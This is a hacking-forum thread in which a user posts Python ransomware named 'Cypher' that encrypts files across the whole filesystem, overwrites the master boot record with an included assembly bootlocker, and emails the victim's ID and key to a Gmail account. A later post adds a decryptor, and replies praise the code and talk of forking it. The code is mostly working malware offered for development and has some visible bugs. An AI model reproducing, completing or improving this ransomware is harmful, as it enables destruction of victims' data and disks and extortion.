chevron_left chevron_right
Login Register invert_colors photo_library


Stay updated and chat with others! - Join the Discord!
Thread Rating:
  • 0 Vote(s) - 0 Average


Python based Ransomware. filter_list
Author
Message
Python based Ransomware. #1
Ethics of authoring malware aside. I think it is an interesting subject. As such i have a project in development that is basically a ransomware. Now i have never written one of these before so some improvements may be needed,

I decided to call my malware Cypher.

Cypher is a proof of concept ransomware which implements the PyCrpto module and uses gmail(Currently) as a sort of command and control server. It is a work in progress as of yet and i will be releasing updates periodically depending on the amount of time i have to work on the project. The general idea is that the personal files get encrypted and the bootsector gets overwritten with a custom bootloader. As of yet i am looking into writing the bootlocker directly to disk, since at the moment i am just calling `dd` from within the script.

Code:
# Cypher is a work in progress, as such this is an Alpha release of the encryption
# module, for reporting bugs feel free to open an issue or should you wish to
# collaborate on this, pull requests are welcomed as well.

import os
import sys
import random
import struct
import smtplib
import string
import datetime
import time

import getpass as gp

from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from multiprocessing import Pool


# Function to generate our client ID
def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))


ID = gen_client_ID(12)
key = RSA.generate(2048)
exKey = RSA.exportKey('PEM')

# Check to see if we're on linux and have root, if so use dd to override the MBR with our bootlocker.
if sys.platform == 'linux2' and gp.getuser() == 'root':
    try:
        os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
        pass    
else:            
    try:
        os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
        pass



def send_ID_Key():
    ts = datetime.datetime.now()
    SERVER = "smtp.gmail.com"         
    PORT = 587                         
    USER= "address@gmail.com"        # Specify Username Here
    PASS= "prettyflypassword"        # Specify Password Here
    FROM = USER
    TO = ["address@gmail.com"]         
    SUBJECT = "Ransomware data: "+str(ts)
    MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
    message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
    try:              
        server = smtplib.SMTP()
        server.connect(SERVER, PORT)
        server.starttls()
        server.login(USER, PASS)
        server.sendmail(FROM, TO, message)
        server.quit()
    except Exception as e:
        # print e
        pass
    


def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):

    if not out_filename:
        out_filename = in_filename + '.crypt'

    iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    filesize = os.path.getsize(in_filename)

    with open(in_filename, 'rb') as infile:
        with open(out_filename, 'wb') as outfile:
            outfile.write(struct.pack('<Q', filesize))
            outfile.write(iv)

            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += ' ' * (16 - len(chunk) % 16)

                outfile.write(encryptor.encrypt(chunk))
                
                

def single_arg_encrypt_file(in_filename):
    encrypt_file(key, in_filename)

def select_files():
    
    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
           ".mov", ".gif", ".txt", ".py", ".pyc", ".jar"]
          
    files_to_enc = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(tuple(ext)):
                files_to_enc.push(os.path.join(root, file))

    # Parallelize execution of encryption function over four subprocesses
    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)
                

def note():
    
    readme = """
    
    .d8888b.                    888                      
    d88P  Y88b                   888                      
    888    888                   888                      
    888        888  888 88888b.  88888b.   .d88b.  888d888
    888        888  888 888 "88b 888 "88b d8P  Y8b 888P"  
    888    888 888  888 888  888 888  888 88888888 888    
    Y88b  d88P Y88b 888 888 d88P 888  888 Y8b.     888    
    "Y8888P"   "Y88888 88888P"  888  888  "Y8888  888    
                    888 888                                
             Y8b d88P 888                                
             "Y88P"  888    
    
    
    
    Hello, unfortunately all your personal files have been encrypted with millitary grade encryption and will be impossible
    to retrieve without aquiring the encryption key and decrypting binary.
    As of yet these are not available to you since the Cypher ransomware is still under construction.
    We thank you for your patience.

    Have a nice day,

    The Cypher Project."""     
    
    # Windows variant
    # outdir = os.getenv('USERNAME') + "\\Desktop"
    
    outdir = os.getenv('HOME') + "/Desktop/"
    outfile = outdir + "README"
    
    handler = open(outputfile, 'w')
    handler.write(outfile, ID)
    handler.close()
    
if __name__=="__main__":
    gen_client_ID()
    send_ID_Key()
    
    try:
        select_files()
        note()
    except Exception as e:
        pass

Bootlocker source in ASM.

Code:
[BITS 16]
[ORG 0x7C00]
MOV SI, Msg
CALL OutStr
JMP $
OutChar:
MOV AH, 0x0E
MOV BH, 0x00
MOV BL, 0x07
INT 0x10
RET
OutStr:
next_char:
MOV AL, [SI]
INC SI
OR AL, AL
JZ exit_function
CALL OutChar
JMP next_char
exit_function:
RET
Msg db 0xA, 0xD, 0xA, 0xD
   db '########################################################', 0xA, 0xD
   db '#   Your harddrive is encrypted with military grade    #', 0xA, 0xD
   db '#   encryption, you wont get your files back, since    #', 0xA, 0xD
   db '#  the Cypher ransomware is still under construction   #', 0xA, 0xD
   db '                                              ', 0xA, 0xD
   db '########################################################', 0xA, 0xD, 0xA, 0xD
   db 'Unfortunately there are only 7 days left until the encryption key is destroyed.', 0xA, 0xD, 0xA, 0xD
   db 'Have a nice day,', 0xA, 0xD
   db '     The Cypher Project', 0
TIMES 510 - ($ - $$) db 0
DW 0xAA55


The purpose of this thread would be to discuss ideas, better implementations and think about general improvements. This is a project intended for experimental and educational purposes. As such i would advise against deploying this malware in active engagement. Thank you for your understanding.

The project's github page can be found here.

Reply

RE: Python based Ransomware. #2
This was a pretty cool read-through. I lost sight of python a while back and forgot how powerful of a language it really is. I need to get back into it again.
[Image: F4Z9Dqw.png]

[+] 1 user Likes BreShiE's post
Reply

RE: Python based Ransomware. #3
I've never thought of using email as a CI, nice thinking. I might fork this and mess around with it when I have some time on my hands.

Reply

RE: Python based Ransomware. #4
Thank you for sharing this, I am currently learning python and this could be fun to mess around with.
[Image: 5u8rTPk.jpg]
Click image to go to my website, it has been updated!

Reply

RE: Python based Ransomware. #5
Sorry for my absence, i forgot i had a Sinister.ly account, lol. Anyway now that i am here again, i bring updates to this project in the form of bug fixes and the decryption module.

Code:
import os
import sys
import struct

from base64 import b64decode
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from multiprocessing import Pool

# Read in and decode keyfile
with open('privkey', 'r') as keyfile:
    keyData = keyfile.read().replace('\n', '')

keyDER = b64decode(keyData)    
key = RSA.importKey(keyDER)


def decrypt_file(key, in_filename, out_filename=None, chunksize=24*1024):

    # Split .crypt extension to restore file format
    if not out_filename:
        out_filename = os.path.splitext(in_filename)[0]

    with open(in_filename, 'rb') as infile:
        origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
        iv = infile.read(16)
        decryptor = AES.new(key, AES.MODE_CBC, iv)

        with open(out_filename, 'wb') as outfile:
            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                outfile.write(decryptor.decrypt(chunk))
        
        # Truncate file to original size
            outfile.truncate(origsize)


def single_arg_decrypt_file(in_filename):
    decrypt_file(key, in_filename)


def select_files():
    # Files to be decrypted are identified by .crypt extension
    ext = ".crypt"
          
    files_to_dec = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(str(ext)):
                files_to_dec.push(os.path.join(root, file))
    
    # Parralelize execution of decrypting function over four sub processes
    pool = Pool(processes=4)
    pool.map(single_arg_decrypt_file, files_to_dec)


if __name__=="__main__":
    select_files()

[+] 2 users Like VectorSEC's post
Reply

RE: Python based Ransomware. #6
Currently experimenting with Python. Might play around with this for educational purposes.

Reply

RE: Python based Ransomware. #7
Thank you, I certainly will look into it!

Reply

RE: Python based Ransomware. #8
Might be intressting to make FTP functionality.

Reply

RE: Python based Ransomware. #9
Despite my heavy disgust for ransomwares (I like coding malwares but ransom is the kind of hacking that's amateur and not elegant enough) the code is really elegant, I would have used more oneliner hacks but it's really nice!
Also keep in mind that the cypher name is already taken, but nice work
(This post was last modified: 02-01-2017, 01:38 PM by silur.)
Reflection of a lonely being trapped in a false time
exposing your precious secrets for I am scared of mine
tox: E321B7DD931582DE0277E578578F37B0E41FB9838E9466035235BFDE5E1F3C1C10026A5982BF

Reply






Users browsing this thread: 1 Guest(s)